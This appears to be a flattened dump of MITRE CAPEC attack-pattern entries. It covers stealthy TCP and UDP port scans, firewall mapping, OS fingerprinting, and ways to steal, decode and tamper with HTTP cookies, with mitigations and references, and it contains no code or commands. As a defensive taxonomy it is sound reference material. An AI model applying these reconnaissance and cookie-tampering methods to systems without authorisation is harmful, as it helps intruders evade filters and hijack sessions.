An attacker uses a TCP FIN scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the FIN bit set in the packet header. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. The major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. FIN packets, like out-of-state ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports.
1. Speed: TCP FIN scanning is fast compared to other types of scans
2. Stealth: TCP FIN scanning is stealthy compared to other types of scans
3. Open Port: Detects an open port via no response to the segment
4. Closed Port: Detects that a closed via a RST received in response to the FIN
5. Filtered Port: Cannot distinguish between a filtered port and an open port
6. Unfiltered Port: Cannot distinguish between an unfiltered port and a non-stateful filtered port
FIN scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, FIN scanning a system protected by a stateful firewall may indicate all ports being open. For these reasons, FIN scanning results must always be interpreted as part of a larger scanning strategy. FIN scanning is still relatively stealthy as the packets tend to blend in with the background noise on a network link. FIN scans are detected via heuristic (non-signature) based algorithms, much in the same way as other scan types are detected.
Transport Layer
Server-side
Host
Service
FIN scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
Low
The ability to send TCP FIN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 55
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107
3rd "Zero Day" Edition
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the all flags sent in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. he major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. XMAS packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports.
1. Speed: TCP XMAS scanning is fast compared to other types of scans
2. Stealth: TCP XMAS scanning was once stealthy, but is now easily detected by IDS/IPS systems
3. Open Port: Detects an open port via no response to the segment
4. Closed Port: Detects that a closed via a RST received in response to the FIN
5. Filtered Port: Cannot distinguish between a filtered port and an open port
6. Unfiltered Port: Cannot distinguish between an unfiltered port and a non-stateful filtered port
XMAS scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, XMAS scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, XMAS scans are flagged by almost all intrusion prevention or intrusion detection systems.
Transport Layer
Server-side
Host
Service
XMAS scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
Low
The ability to send TCP segments with every flag set to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
Availability
Unexpected State
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a TCP NULL scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with no flags in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. he major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. NULL packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason NULL scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports.
1. Speed: TCP NULL scanning is fast compared to other types of scans
2. Stealth: TCP NULL scanning was once stealthy, but is now easily detected by IDS/IPS systems
3. Open Port: Detects an open port via no response to the segment
4. Closed Port: Detects that a closed via a RST received in response to the FIN
5. Filtered Port: Cannot distinguish between a filtered port and an open port
6. Unfiltered Port: Cannot distinguish between an unfiltered port and a non-stateful filtered port
NULL scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, NULL scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, NULL scans are flagged by almost all intrusion prevention or intrusion detection systems.
Transport Layer
Server-side
Host
Service
NULL scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
Low
The ability to send TCP segments with no flags set to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state. This type of scanning is rarely useful alone, but when combined with SYN scanning, gives a more complete picture of the type of firewall rules that are present. When a TCP ACK segment is sent to a closed port, or sent out-of-sync to a listening port, the RFC 793 expected behavior is for the device to respond with a RST. Getting RSTs back in response to a ACK scan gives the attacker useful information that can be used to infer the type of firewall present. Stateful firewalls will discard out-of-sync ACK packets, leading to no response. When this occurs the port is marked as filtered. When RSTs are received in response, the ports are marked as unfiltered, as the ACK packets solicited the expected behavior from a port. When combined with SYN techniques an attacker can gain a more complete picture of which types of packets get through to a host and thereby map out its firewall rule-set. ACK scanning, when combined with SYN scanning, also allows the attacker analyze whether a firewall is stateful or non-stateful. If a SYN solicits a SYN/ACK or a RST and an ACK solicits a RST, the port is unfiltered by any firewall type. If a SYN solicits a SYN/ACK, but an ACK generates no response, the port is statefully filtered. When a SYN generates neither a SYN/ACK or a RST, but an ACK generates a RST, the port is statefully filtered. When neither SYN nor ACK generates any response, the port is blocked by a specific firewall rule, which can occur via any type of firewall.
1. Speed: TCP ACK scanning is fast compared to other types of scans
2. Stealth: TCP ACK scanning is stealthy
3. Open Port: Cannot detect open ports
4. Closed Port: Cannot detect closed ports
5. Filtered Port: Can detect stateful vs. non-stateful filters when combined with SYN probes
6. Unfiltered Port: Can detect unfiltered ports when combined with SYN probes
Interpreting the results of ACK scanning requires rather sophisticated analysis. A skilled attacker may use this method to map out firewall rules, but the results of ACK scanning will be less useful to a novice.
Transport Layer
Server-side
Host
Firewall
ACK scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
Low
The ability to send TCP ACK segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 55-56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 5.7 TCP ACK Scan, pg. 113
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in TCP Window scanning to analyze port status and operating system type. TCP Window scanning uses the ACK scanning method but examine the TCP Window Size field of response RST packets to make certain inferences. This scanning method works against fewer TCP stack implementations than any other type of scan. Some operating systems return a positive TCP window size when a RST packet is sent from an open port, and a negative value when the RST originates from a closed port.
1. Speed: TCP Window scanning is fast compared to other types of scans
2. Stealth: TCP Window scanning is relatively stealthy, much like ACK scanning
3. Open Port: Can detect open ports based on Window size for a limited number of operating systems
4. Closed Port: Can detect closed ports based on Window size for limited number of operating systems
5. Filtered Port: Can identify filtered ports when combined with other methods
6. Unfiltered Port: Can identify unfiltered ports when combined with other methods
TCP Window scanning is one of the most complex scan types, and its results are difficult to interpret. Window scanning alone rarely yields useful information, but when combined with other types of scanning is more useful. TCP Window scanning is a more reliable means of making inference about operating system versions than port status.
Transport Layer
Server-side
Host
Service
TCP Window scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
Low
The ability to send TCP segments with a custom window size to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 55-56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 5.8 TCP Window Scan, pg. 115
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker scan for RPC services listing on a Unix/Linux host. This type of scan can be obtained via native operating system utilities or via port scanners like nmap. When performed by a scanner, an RPC datagram is sent to a list of UDP ports and the response is recorded. Particular types of responses can be indicative of well-known RPC services running on a UDP port.
1. Speed: Direct RPC scans that bypass portmapper/sunrpc are typically slow compare to other scan types
2. Stealth: RPC scanning is not stealthy, as IPS/IDS systems detect RPC queries
3. Open Port: Can only detect open ports when an RPC service responds
4. Closed Port: Detects closed ports on the basis of ICMP diagnostic messages.
5. Filtered Port: Cannot identify filtered ports
6. Unfiltered Port: Cannot identify unfiltered ports
There are two general approaches to RPC scanning. One is to use a native operating system utility, or script, to query the portmapper/rpcbind application running on port 111. Portmapper will return a list of registered RPC services. Alternately, one can use a port scanner or script to scan for RPC services directly. Discovering RPC services gives the attacker potential targets to attack, as some RPC services are insecure by default.
Transport Layer
Server-side
Host
Service
RPC scanning requires no special privileges when it is performed via a native system utility.
Low
The ability to craft custom RPC datagrams for use during network reconnaissance. By tailoring the bytes injected one can scan for specific RPC-registered services. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
J. Postel
RFC768 - User Datagram Protocol
August 28, 1980
http://www.faqs.org/rfcs/rfc768.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 7.5.2 RPC Grinding, pg. 156
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in UDP scanning to gather information about UDP port status. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port. Firewalls or ACLs which block egress ICMP error types effectively prevent UDP scans from returning any useful information. UDP scanning is further complicated by rate limiting mechanisms governing ICMP error messages. During a UDP scan, a datagram is sent to a target port. If an ICMP Type 3 Port unreachable error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port.
1. Speed: UDP scanning is very slow due to ICMP rate limiting
2. Stealth: RPC scanning is relatively stealthy provided the sending rate does not trigger IPS/IDS sensors
3. Open Port: Infers an open port based on no response, or an occasional response by a well-known service
4. Closed Port: Detects a closed port using return ICMP diagnostic messages from the host
5. Filtered Port: Can detect some filtered ports via ICMP diagnostic messages
6. Unfiltered Port: Can detect unfiltered ports based on some ICMP diagnostic messages
The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.
Network Layer
Server-side
Host
Service
The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply.
Low
The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
300
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 54-69
6th Edition
McGraw Hill
2009
J. Postel
RFC768 - User Datagram Protocol
August 28, 1980
http://www.faqs.org/rfcs/rfc768.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 5.4 RPC Grinding, pg. 101
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.
Network Layer
Transport Layer
Application Layer
Server-side
Host
Service
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
None
Low
Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication.
Confidentiality
"Varies by context"
1000
Attack Pattern
ChildOf
169
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems.
The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein.
The second form of this attack involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the attacker to impersonate the remote user/session.
The third form is when the cookie's content is modified by the attacker before it is sent back to the server. Here the attacker seeks to convince the target server to operate on this falsified information.
Obtain copy of cookie
The attacker first needs to obtain a copy of the cookie. The attacker may be a legitimate end user wanting to escalate privilege, or could be somebody sniffing on a network to get a copy of HTTP cookies.
Obtain cookie from local filesystem (e.g. C:\Documents and Settings\*\Cookies and C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\cookies.txt in Windows)
env-Web
Sniff cookie using a network sniffer such as Wireshark
env-Web
Obtain cookie from local memory or filesystem using a utility such as the Firefox Cookie Manager or AnEC Cookie Editor.
env-Web
Steal cookie via a cross-site scripting attack.
env-Web
Guess cookie contents if it contains predictable information.
env-Web
Cookies used in web application.
env-Web
Cookies not used in web application.
env-Web
Cookie captured by attacker.
Cookie cannot be captured by attacker.
To prevent network sniffing, cookies should be transmitted over HTTPS and not plain HTTP. To enforce this on the client side, the "secure" flag should be set on cookies (javax.servlet.http.Cookie.setSecure() in Java, secure flag in setcookie() function in php, etc.).
Obtain sensitive information from cookie
The attacker may be able to get sensitive information from the cookie. The web application developers may have assumed that cookies are not accessible by end users, and thus, may have put potentially sensitive information in them.
If cookie shows any signs of being encoded using a standard scheme such as base64, decode it.
env-Web
Analyze the cookie's contents to determine whether it contains any sensitive information.
env-Web
Cookie only contains a random session ID (e.g. ASPSESSIONID, JSESSIONID, etc.)
env-Web
Cookie contains sensitive information (e.g. "ACCTNO=0234234", or "DBIP=0xaf112a22" -- database server's IP address).
env-Web
Cookie's contents cannot be deciphered.
env-Web
Cookie contains sensitive information that developer did not intent the end user to see.
Cookie does not contain any sensitive information.
Do not store sensitive information in cookies unless they are encrypted such that only the server can decrypt them.
Modify cookie to subvert security controls.
The attacker may be able to modify or replace cookies to bypass security controls in the application.
Modify logical parts of cookie and send it back to server to observe the effects.
env-Web
Modify numeric parts of cookie arithmetically and send it back to server to observe the effects.
env-Web
Modify cookie bitwise and send it back to server to observe the effects.
env-Web
Replace cookie with an older legitimate cookie and send it back to server to observe the effects. This technique would be helpful in cases where the cookie contains a "points balance" for a given user where the points have some value. The user may spend his points and then replace his cookie with an older one to restore his balance.
env-Web
Subversion of security controls on server
Cookie reset by server
Web server logs contain many messages indicating that invalid cookies were received from client.
Cookies should not contain any information that the user is not allowed to modify, unless that information is never expected to change. In the latter case, the integrity of the cookie should be protected using a digital signature or a message authentication code.
Target server software must be a HTTP daemon that relies on cookies.
High
High
Modification of Resources
API Abuse
Protocol Manipulation
Time and State
There are two main attack vectors for exploiting poorly protected session variables like cookies. One is the local machine itself which can be exploited directly at the physical level or indirectly through XSS and phishing. In addition, the man in the middle attack relies on a network sniffer, proxy, or other intermediary to intercept the subject's credentials and use them to impersonate the digital subject on the host. The issue is that once the credentials are intercepted, impersonation is trivial for the attacker to accomplish if no other protection mechanisms are in place.
Low
To overwrite session cookie data, and submit targeted attacks via HTTP
High
Exploiting a remote buffer overflow generated by attack
Ability to send HTTP request containing cookie to server
Design: Use input validation for cookies
Design: Generate and validate MAC for cookies
Implementation: Use SSL/TLS to protect cookie in transit
Implementation: Ensure the web server implements all relevant security patches, many exploitable buffer overflows are fixed in patches issued for the software.
Confidentiality
Read application data
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
HTTP cookie
Malicious input delivered through cookie in HTTP Request.
Client software, such as a browser and its component libraries, or an intermediary
Enables attacker to leverage state stored in cookie
Enables attacker a vector to attack web server and platform
565
Targeted
302
Targeted
311
Targeted
113
Targeted
539
Targeted
20
Targeted
315
Targeted
384
Targeted
472
Secondary
724
Targeted
602
Targeted
642
Targeted
1000
Attack Pattern
ChildOf
39
1000
Attack Pattern
ChildOf
21
1000
Category
ChildOf
255
1000
Attack Pattern
ChildOf
117
1000
Category
ChildOf
262
Exploitation
High
High
Low
Client-Server
n-Tier
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in scanning activity to find vulnerable software versions or types, such as operating system versions or network services. Vulnerable or exploitable network configurations, such as improperly firewalled systems, or misconfigured systems in the DMZ or external network, provide windows of opportunity for an attacker. Common types of vulnerable software include unpatched operating systems or services (e.g FTP, Telnet, SMTP, SNMP) running on open ports that the attacker has identified. Attackers usually begin probing for vulnerable software once the external network has been port scanned and potential targets have been revealed.
Network Layer
Transport Layer
Application Layer
Server-side
Host
Service
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
Access to the network on which the targeted system resides.
Software tools used to probe systems over a range of ports and protocols.
Low
Medium
To probe a system remotely without detection requires careful planning and patience.
Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary engages in fingerprinting activities to determine the type or version of the operating system of the remote target. Operating System detection is possible because implementations of common protocols (Such as IP or TCP) differ in distinct ways. While the implementation differences are not sufficient to 'break' compatibility with the protocol, the differences are detectable because the target will respond in unique ways to specific probing activity that breaks the semantic or logical rules of packet construction for a protocol. Different operating systems will have a unique response to anomalous input, providing the basis to fingerprint the OS behavior. This type of OS fingerprinting can distinguish between operating system types and versions.
Fingerprinting remote operating systems involves taking an "active" or a "passive" approach. Active approaches to fingerprinting involve sending data packets that break the logical or semantic rules of a protocol and observing operating system response to artificial inputs. Passive approaches involve listening to the communication of one or more nodes and identifying the operating system or firmware of the devices involved based on the structure of their messages.
Network Layer
Transport Layer
Application Layer
Server-side
Host
Service
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
None
Low
Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
224
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in activity to detect the operating system or firmware version of a remote target by interrogating a device, server, or platform with a probe designed to solicit behavior that will reveal information about the operating systems or firmware in the environment. Operating System detection is possible because implementations of common protocols (Such as IP or TCP) differ in distinct ways. While the implementation differences are not sufficient to 'break' compatibility with the protocol the differences are detectable because the target will respond in unique ways to specific probing activity that breaks the semantic or logical rules of packet construction for a protocol. Different operating systems will have a unique response to the anomalous input, providing the basis to fingerprint the OS behavior. This type of OS fingerprinting can distinguish between operating system types and versions.
Network Layer
Server-side
Host
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
The ability to send and receive packets from a remote target, or the ability to passively monitor network communications.
Low
Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges. Installing a listener on the network requires access to at least one host, and the privileges to interface with the network interface card.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
311
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in activity to detect the version or type of OS software in a an environment by passively monitoring communication between devices, nodes, or applications. Passive techniques for operating system detection send no actual probes to a target, but monitor network or client-server communication between nodes in order to identify operating systems based on observed behavior as compared to a database of known signatures or values. While passive OS fingerprinting is not usually as reliable as active methods it is more stealthy.
Network Layer
Transport Layer
Application Layer
Server-side
Host
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
The ability to send and receive packets from a remote target, or the ability to passively monitor network communications.
Low
Installing a listener on the network requires access to at least one host, and the privileges to interface with the network device.
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
311
Stuart McClure
Joel Scambray
George Kurtz
